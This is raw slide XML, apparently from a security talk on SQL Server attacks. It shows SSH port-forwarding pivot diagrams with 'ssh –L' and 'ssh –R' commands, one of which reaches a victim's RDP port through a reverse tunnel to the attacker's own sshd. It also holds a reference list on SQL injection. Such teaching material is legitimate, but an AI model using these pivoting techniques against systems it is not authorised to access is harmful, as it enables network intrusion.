          </a:p>
          <a:p>
            <a:pPr lvl="5"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="989898"/>
                </a:solidFill>
              </a:rPr>
              <a:t>B) particularly helpful right now</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="989898"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4" descr="images.jpeg"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7061200" y="2957948"/>
            <a:ext cx="423862" cy="545722"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5" descr="attacker-icon.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="696913" y="2881987"/>
            <a:ext cx="1130300" cy="1003300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="TextBox 6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="696913" y="3885287"/>
            <a:ext cx="1130300" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Client</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="TextBox 7"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3898900" y="3733800"/>
            <a:ext cx="1130300" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Pivot</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="TextBox 8"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7061200" y="3853021"/>
            <a:ext cx="1130300" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Target</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="TextBox 9"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2870200" y="3230809"/>
            <a:ext cx="1219200" cy="430887"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="r"/>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" smtClean="0"/>
              <a:t>Listens on </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="r"/>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" smtClean="0"/>
              <a:t>port 22</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1100" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="15" name="Picture 14" descr="victim-icon.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7061200" y="2716887"/>
            <a:ext cx="1168400" cy="1168400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="Rounded Rectangle 15"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3352800" y="4114800"/>
            <a:ext cx="22860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Pivot runs </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>sshd</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="Right Arrow 16"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1693332" y="3096487"/>
            <a:ext cx="2396067" cy="7565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t>ssh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t> –L 55555:target:25</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="L-Shape 17"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1041400" y="2881987"/>
            <a:ext cx="6324600" cy="621683"/>
          </a:xfrm>
          <a:prstGeom prst="corner">
            <a:avLst>
              <a:gd name="adj1" fmla="val 47276"/>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Proxied</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> connection from Client to Target port</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="Merge 18"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="790787" y="2751811"/>
            <a:ext cx="822960" cy="436879"/>
          </a:xfrm>
          <a:prstGeom prst="flowChartMerge">
            <a:avLst/>
          </a:prstGeom>
          <a:ln/>
        </p:spPr>
        <p:style>
          <a:lnRef idx="1">
            <a:schemeClr val="accent1"/>
          </a:lnRef>
          <a:fillRef idx="3">
            <a:schemeClr val="accent1"/>
          </a:fillRef>
          <a:effectRef idx="2">
            <a:schemeClr val="accent1"/>
          </a:effectRef>
          <a:fontRef idx="minor">
            <a:schemeClr val="lt1"/>
          </a:fontRef>
        </p:style>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21" name="TextBox 20"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="608013" y="2286000"/>
            <a:ext cx="1219200" cy="430887"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" smtClean="0"/>
              <a:t>Listens on </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" smtClean="0"/>
              <a:t>port 55555</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1100" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22" name="TextBox 21"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6146800" y="3288226"/>
            <a:ext cx="1219200" cy="430887"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="r"/>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" smtClean="0"/>
              <a:t>Listens on </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="r"/>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" smtClean="0"/>
              <a:t>port 25</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6"/>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2"/>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7"/>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21"/>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1" nodeType="clickEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="84" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="3">
                                            <p:txEl>
                                              <p:pRg st="7" end="7"/>
                                            </p:txEl>
                                          </p:spTgt>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p:bldP spid="8" grpId="0"/>
      <p:bldP spid="9" grpId="0"/>
      <p:bldP spid="10" grpId="0"/>
      <p:bldP spid="10" grpId="1"/>
      <p:bldP spid="16" grpId="0" animBg="1"/>
      <p:bldP spid="16" grpId="1" animBg="1"/>
      <p:bldP spid="17" grpId="0" animBg="1"/>
      <p:bldP spid="17" grpId="1" animBg="1"/>
      <p:bldP spid="18" grpId="0" animBg="1"/>
      <p:bldP spid="21" grpId="0"/>
      <p:bldP spid="21" grpId="1"/>
      <p:bldP spid="21" grpId="2"/>
      <p:bldP spid="22" grpId="0"/>
      <p:bldP spid="22" grpId="1"/>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457200" y="1066800"/>
            <a:ext cx="8229600" cy="4525963"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2100" dirty="0" smtClean="0"/>
              <a:t>“Advanced SQL Injection In SQL Server Applications”, Chris </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2100" dirty="0" err="1" smtClean="0"/>
              <a:t>Anley</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2100" dirty="0" smtClean="0"/>
              <a:t>, 2002</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2100" dirty="0" smtClean="0"/>
              <a:t>“Building the bridge between the web app and the OS:  GUI access through SQL Injection”, Alberto </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2100" dirty="0" err="1" smtClean="0"/>
              <a:t>Revelli</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2100" dirty="0" smtClean="0"/>
              <a:t>, 2008</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2100" dirty="0" smtClean="0"/>
              <a:t>“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2100" dirty="0" err="1" smtClean="0"/>
              <a:t>IServerXMLHTTPRequest/ServerXMLHTTP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2100" dirty="0" smtClean="0"/>
              <a:t>” http://msdn.microsoft.com/en-us/library/ms762278%28VS.85%29.aspx</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2100" dirty="0" smtClean="0"/>
              <a:t>“The Extended HTML Form attack revisited”, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2100" dirty="0" err="1" smtClean="0"/>
              <a:t>Sandro</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2100" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2100" dirty="0" err="1" smtClean="0"/>
              <a:t>Gauci</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2100" dirty="0" smtClean="0"/>
              <a:t>, 2008</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2100" dirty="0" smtClean="0"/>
              <a:t>“Programming Microsoft® SQL Server™ 2005”, Andrew J. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2100" dirty="0" err="1" smtClean="0"/>
              <a:t>Brust</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2100" dirty="0" smtClean="0"/>
              <a:t>, 2006</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2100" dirty="0" smtClean="0"/>
              <a:t>“Writing Stored Procedures for Microsoft SQL Server”, Mathew </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2100" dirty="0" err="1" smtClean="0"/>
              <a:t>Shepker</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2100" dirty="0" smtClean="0"/>
              <a:t>, 2000</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2100" dirty="0" smtClean="0"/>
              <a:t>“Overview of Native XML Web Services for Microsoft SQL Server 2005”, http://msdn.microsoft.com/en-us/library/ms345123.aspx, 2005</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2100" dirty="0" smtClean="0"/>
              <a:t>http://msdn.microsoft.com/</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2100" dirty="0" smtClean="0"/>
              <a:t>“Compiling and Deploying a CLR Assembly “, http://msdn.microsoft.com/en-us/library/ms254956(VS.80).aspx</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2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1.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="844982" y="1676400"/>
            <a:ext cx="7622400" cy="1300703"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Picture 7" descr="images.jpeg"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7033418" y="1972805"/>
            <a:ext cx="423862" cy="545722"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="14" name="Picture 13" descr="victim-icon.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7033418" y="1731744"/>
            <a:ext cx="1168400" cy="1168400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="24" name="Picture 23" descr="ear-right.jpg"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1585965" y="1972806"/>
            <a:ext cx="423862" cy="545722"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Title 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>SSH Tunnels (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>b</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1066800"/>
            <a:ext cx="8229600" cy="5287962"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Instead lets look at –R</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>So all we need is an </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>ssh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> client on the remote machine, an SSHD on one of ours and we are in the game!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>putty + plink FTW!</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="Picture 8" descr="attacker-icon.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3962400" y="1864578"/>
            <a:ext cx="1130300" cy="1003300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="TextBox 9"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="669131" y="2900144"/>
            <a:ext cx="1130300" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Local machine</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="TextBox 10"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3833018" y="2935069"/>
            <a:ext cx="1130300" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Client is the Pivot</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="TextBox 11"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7033418" y="2867878"/>
            <a:ext cx="1130300" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Target</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="TextBox 12"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5943600" y="2303083"/>
            <a:ext cx="1219200" cy="430887"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="r"/>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" smtClean="0"/>
              <a:t>Listens on </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="r"/>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" smtClean="0"/>
              <a:t>port 3389</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1100" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="Merge 16"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="844982" y="1329790"/>
            <a:ext cx="822960" cy="436879"/>
          </a:xfrm>
          <a:prstGeom prst="flowChartMerge">
            <a:avLst/>
          </a:prstGeom>
          <a:ln/>
        </p:spPr>
        <p:style>
          <a:lnRef idx="1">
            <a:schemeClr val="accent1"/>
          </a:lnRef>
          <a:fillRef idx="3">
            <a:schemeClr val="accent1"/>
          </a:fillRef>
          <a:effectRef idx="2">
            <a:schemeClr val="accent1"/>
          </a:effectRef>
          <a:fontRef idx="minor">
            <a:schemeClr val="lt1"/>
          </a:fontRef>
        </p:style>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="Rounded Rectangle 17"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3276600" y="3048000"/>
            <a:ext cx="22860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Pivot runs </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>ssh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> client</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="TextBox 19"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1585965" y="2518528"/>
            <a:ext cx="865980" cy="430887"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" smtClean="0"/>
              <a:t>Listens on </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" smtClean="0"/>
              <a:t>port 22</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1100" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21" name="Rounded Rectangle 20"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="165945" y="3048000"/>
            <a:ext cx="22860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Local machine runs </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>sshd</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22" name="Left Arrow 21"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1647031" y="1752600"/>
            <a:ext cx="2315369" cy="118342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ssh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> –R 55555:target:3389</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="28" name="Picture 27" descr="images.jpeg"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="631031" y="1972806"/>
            <a:ext cx="423862" cy="545722"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 6" descr="victim-icon.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
